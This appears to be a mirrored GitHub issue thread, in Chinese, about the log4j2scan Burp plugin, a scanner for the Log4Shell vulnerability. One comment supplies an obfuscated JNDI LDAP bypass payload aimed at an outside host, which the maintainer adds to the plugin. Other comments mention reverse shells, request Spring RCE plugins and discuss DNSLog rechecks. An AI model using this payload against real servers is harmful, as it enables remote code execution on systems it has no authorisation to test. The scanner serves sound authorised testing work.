Giter VIP home page Giter VIP logo

Comments (13)

whwlsfb avatar whwlsfb commented on July 21, 2024

POC目前是以插件的形式存在与本插件中的,如果手工提供poc,插件将无法确定这是属于哪个Dnslog平台,也就无法扫描闭环,所以就没有意义了。

如果可以的话麻烦提供下bypass的语句,我添加进本插件中,这样可以直接选中你提供的bypass POC就可以了。

from log4j2scan.

coinbase6516 avatar coinbase6516 commented on July 21, 2024

好的 请把这个poc添加到插件中,,${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://somesitehackerofhell.com/z

from log4j2scan.

whwlsfb avatar whwlsfb commented on July 21, 2024

👍感谢,该poc已加入,测试可用,你可以pull最新的源码本地编译使用,或等待下个版本发布后使用。

from log4j2scan.

coinbase6516 avatar coinbase6516 commented on July 21, 2024

使用过程中还发现一个问题,就是我每天扫描的url比较多 ,每次扫到漏洞之后 必须等待burp全部流量扫描完成之后才能给出结果,插件虽然给出了漏洞的链接,但是没有给出具体的注入点,,,必须等待burp扫描完成才能看到准确的post包和注入点,,能不能在插件ui里面增加一个扫到结果直接给出具体注入点和post包的功能,不用等待burp流量全部走完。这样会大大节省作业时间。

from log4j2scan.

coinbase6516 avatar coinbase6516 commented on July 21, 2024

还有一个问题,插件新增的延迟检测功能我不太清楚具体的思路和延迟等待时间是多久,而且我感觉这个功能有点问题,可以不用添加这个功能,因为这个功能不适合插件我感觉,像这种延迟比较高的 手动等待就行了,,目前我遇到的延迟dnslog不会延迟很久正常就行,,遇到的延迟只有是反弹shell个别站点会延迟几分钟弹回来,,我现在使用的还是老版本感觉很好用,新版本我感觉有问题就没有一直使用。

from log4j2scan.

whwlsfb avatar whwlsfb commented on July 21, 2024

还有一个问题,插件新增的延迟检测功能我不太清楚具体的思路和延迟等待时间是多久,而且我感觉这个功能有点问题,可以不用添加这个功能,因为这个功能不适合插件我感觉,像这种延迟比较高的 手动等待就行了,,目前我遇到的延迟dnslog不会延迟很久正常就行,,遇到的延迟只有是反弹shell个别站点会延迟几分钟弹回来,,我现在使用的还是老版本感觉很好用,新版本我感觉有问题就没有一直使用。

这个其实是在原有逻辑上加了一层逻辑而已,就是在首次查询dnslog记录的时候没有查询到,那就将这条记录存到一个map里,然后后面的5分钟内每30s再次查询判断是否触发,所以只是在原逻辑上加了一层保险,而并没有修改原始的逻辑,总体来讲肯定是比早期版本的效果更好一些的

from log4j2scan.

whwlsfb avatar whwlsfb commented on July 21, 2024

使用过程中还发现一个问题,就是我每天扫描的url比较多 ,每次扫到漏洞之后 必须等待burp全部流量扫描完成之后才能给出结果,插件虽然给出了漏洞的链接,但是没有给出具体的注入点,,,必须等待burp扫描完成才能看到准确的post包和注入点,,能不能在插件ui里面增加一个扫到结果直接给出具体注入点和post包的功能,不用等待burp流量全部走完。这样会大大节省作业时间。

这个不应该啊,每条链接都是一个单独的扫描任务,如果插件日志输出了漏洞信息burp的issue界面也会同步展示漏洞的,理论上不会出现等所有流量走完才出现问题详情的。

from log4j2scan.

coinbase6516 avatar coinbase6516 commented on July 21, 2024

啥时候把新的poc加进去那一版 发布一下 我自己不会编译 属于脚本小子

from log4j2scan.

coinbase6516 avatar coinbase6516 commented on July 21, 2024

作者能不能开发一个fastjson的插件或者spring一些rce洞比如spring4shell Spring Cloud Gateway,我不想用市面上的 我想用你写的 我感觉你的插件写的很好 虽然我不懂代码 但是我从使用来说你的插件代码水平很厉害,因为我用你的插件拿到了很多赏金。

from log4j2scan.

coinbase6516 avatar coinbase6516 commented on July 21, 2024

get backend result failed! 这个意思是插件报错了 还是没有获取到返回的dnslog平台记录 是正常返回 还是插件报错返回

from log4j2scan.

coinbase6516 avatar coinbase6516 commented on July 21, 2024

Has missing match scan point: 4960,recheck DNSLog result 这个是正常返回 还是报错了

from log4j2scan.

whwlsfb avatar whwlsfb commented on July 21, 2024

get backend result failed! 这个意思是插件报错了 还是没有获取到返回的dnslog平台记录 是正常返回 还是插件报错返回

这个是获取dnslog平台记录失败,一两次失败也没事,会重试的

from log4j2scan.

whwlsfb avatar whwlsfb commented on July 21, 2024

Has missing match scan point: 4960,recheck DNSLog result 这个是正常返回 还是报错了

这个也是正常的,就是有4960个没触发的,重新检查是否触发

from log4j2scan.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.